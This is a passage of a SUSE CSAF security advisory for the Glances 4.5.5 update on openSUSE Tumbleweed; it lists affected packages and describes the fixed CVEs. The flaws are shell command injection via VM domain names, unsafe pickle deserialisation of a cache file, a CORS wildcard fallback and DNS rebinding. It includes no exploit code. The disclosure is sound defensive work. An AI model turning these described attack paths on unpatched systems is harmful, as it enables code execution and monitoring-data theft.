| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | Vendor Fix |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
